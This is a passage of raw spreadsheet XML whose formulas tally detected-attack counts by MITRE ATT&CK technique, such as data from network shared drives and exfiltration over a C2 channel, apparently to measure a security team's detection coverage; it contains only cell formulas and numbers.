        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>0</v>
      </c>
      <c r="AC12" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD12" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>1</v>
      </c>
      <c r="AE12" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>25</v>
      </c>
      <c r="AF12" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>17</v>
      </c>
      <c r="AG12" s="322" t="str">
        <f t="shared" si="4"/>
        <v>17 (25)</v>
      </c>
      <c r="AH12" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>17</v>
      </c>
      <c r="AI12" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ12" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK12" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>30</v>
      </c>
      <c r="AL12" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>19</v>
      </c>
      <c r="AM12" s="322" t="str">
        <f t="shared" si="5"/>
        <v>19 (30)</v>
      </c>
      <c r="AN12" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>19</v>
      </c>
      <c r="AO12" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP12" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>2</v>
      </c>
      <c r="AQ12" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR12" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS12" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT12" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU12" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV12" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW12" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX12" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY12" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ12" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA12" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB12" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC12" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>0</v>
      </c>
      <c r="BD12" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>0</v>
      </c>
      <c r="BE12" s="4" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF12" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>0</v>
      </c>
      <c r="BG12" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>0</v>
      </c>
      <c r="BH12" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>0</v>
      </c>
      <c r="BI12" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ12" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK12" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL12" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM12" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN12" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO12" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>10</v>
      </c>
      <c r="BP12" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>9</v>
      </c>
      <c r="BQ12" s="4" t="str">
        <f t="shared" si="10"/>
        <v>9 (10)</v>
      </c>
      <c r="BR12" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS12" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>5</v>
      </c>
      <c r="BT12" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU12" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>7</v>
      </c>
      <c r="BV12" s="292">
        <v>5</v>
      </c>
      <c r="BW12" s="322">
        <v>1</v>
      </c>
      <c r="BX12" s="4" t="str">
        <f t="shared" si="11"/>
        <v>1 (5)</v>
      </c>
      <c r="BY12" s="12">
        <v>1</v>
      </c>
      <c r="BZ12" s="13">
        <v>1</v>
      </c>
      <c r="CA12" s="394">
        <v>1</v>
      </c>
      <c r="CB12" s="288">
        <v>10</v>
      </c>
      <c r="CC12" s="4">
        <v>2</v>
      </c>
      <c r="CD12" s="4" t="str">
        <f t="shared" si="12"/>
        <v>2 (10)</v>
      </c>
      <c r="CE12" s="4">
        <v>1</v>
      </c>
      <c r="CF12" s="4">
        <v>1</v>
      </c>
      <c r="CG12" s="13">
        <v>1</v>
      </c>
      <c r="CH12" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:93" ht="15" customHeight="1">
      <c r="A13" s="4">
        <f t="shared" si="13"/>
        <v>11</v>
      </c>
      <c r="B13" s="4" t="str">
        <f>IFERROR(VLOOKUP(A13,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1039</v>
      </c>
      <c r="C13" s="493" t="str">
        <f>IFERROR(VLOOKUP(B13,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data from Network Shared Drive</v>
      </c>
      <c r="D13" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B13)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E13" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F13" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G13" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>1</v>
      </c>
      <c r="H13" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I13" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J13" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K13" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L13" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M13" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N13" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O13" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P13" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q13" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R13" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S13" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>1</v>
      </c>
      <c r="T13" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>1</v>
      </c>
      <c r="U13" s="4" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V13" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="W13" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X13" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y13" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>2</v>
      </c>
      <c r="Z13" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>2</v>
      </c>
      <c r="AA13" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (2)</v>
      </c>
      <c r="AB13" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="AC13" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD13" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>1</v>
      </c>
      <c r="AE13" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>20</v>
      </c>
      <c r="AF13" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>20</v>
      </c>
      <c r="AG13" s="322" t="str">
        <f t="shared" si="4"/>
        <v>20 (20)</v>
      </c>
      <c r="AH13" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>18</v>
      </c>
      <c r="AI13" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ13" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>3</v>
      </c>
      <c r="AK13" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>22</v>
      </c>
      <c r="AL13" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>22</v>
      </c>
      <c r="AM13" s="322" t="str">
        <f t="shared" si="5"/>
        <v>22 (22)</v>
      </c>
      <c r="AN13" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>20</v>
      </c>
      <c r="AO13" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP13" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>3</v>
      </c>
      <c r="AQ13" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR13" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS13" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT13" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU13" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV13" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW13" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX13" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY13" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ13" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA13" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB13" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC13" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>1</v>
      </c>
      <c r="BD13" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>1</v>
      </c>
      <c r="BE13" s="4" t="str">
        <f t="shared" si="8"/>
        <v>1 (1)</v>
      </c>
      <c r="BF13" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>1</v>
      </c>
      <c r="BG13" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH13" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>1</v>
      </c>
      <c r="BI13" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ13" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK13" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL13" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM13" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN13" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO13" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>5</v>
      </c>
      <c r="BP13" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>4</v>
      </c>
      <c r="BQ13" s="4" t="str">
        <f t="shared" si="10"/>
        <v>4 (5)</v>
      </c>
      <c r="BR13" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS13" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>4</v>
      </c>
      <c r="BT13" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU13" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>1</v>
      </c>
      <c r="BV13" s="292">
        <v>1</v>
      </c>
      <c r="BW13" s="322">
        <v>1</v>
      </c>
      <c r="BX13" s="4" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY13" s="12">
        <v>1</v>
      </c>
      <c r="BZ13" s="13">
        <v>1</v>
      </c>
      <c r="CA13" s="394">
        <v>1</v>
      </c>
      <c r="CB13" s="288">
        <v>2</v>
      </c>
      <c r="CC13" s="4">
        <v>2</v>
      </c>
      <c r="CD13" s="4" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE13" s="4">
        <v>1</v>
      </c>
      <c r="CF13" s="4">
        <v>1</v>
      </c>
      <c r="CG13" s="13">
        <v>1</v>
      </c>
      <c r="CH13" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:93" ht="15" customHeight="1">
      <c r="A14" s="4">
        <f t="shared" si="13"/>
        <v>12</v>
      </c>
      <c r="B14" s="4" t="str">
        <f>IFERROR(VLOOKUP(A14,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1041</v>
      </c>
      <c r="C14" s="493" t="str">
        <f>IFERROR(VLOOKUP(B14,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over C2 Channel</v>
      </c>
      <c r="D14" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B14)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E14" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F14" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G14" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>0</v>
      </c>
      <c r="H14" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>0</v>
      </c>
      <c r="I14" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J14" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>0</v>
      </c>
      <c r="K14" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0</v>
      </c>
      <c r="L14" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>0</v>
      </c>
      <c r="M14" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>8</v>
      </c>
      <c r="N14" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>4</v>
      </c>
      <c r="O14" s="322" t="str">
        <f t="shared" si="1"/>
        <v>4 (8)</v>
      </c>
      <c r="P14" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>4</v>
      </c>
      <c r="Q14" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R14" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>2</v>
      </c>
      <c r="S14" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>8</v>
      </c>
      <c r="T14" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>4</v>
      </c>
      <c r="U14" s="4" t="str">
        <f t="shared" si="2"/>
        <v>4 (8)</v>
      </c>
      <c r="V14" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>4</v>
      </c>
      <c r="W14" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X14" s="394">
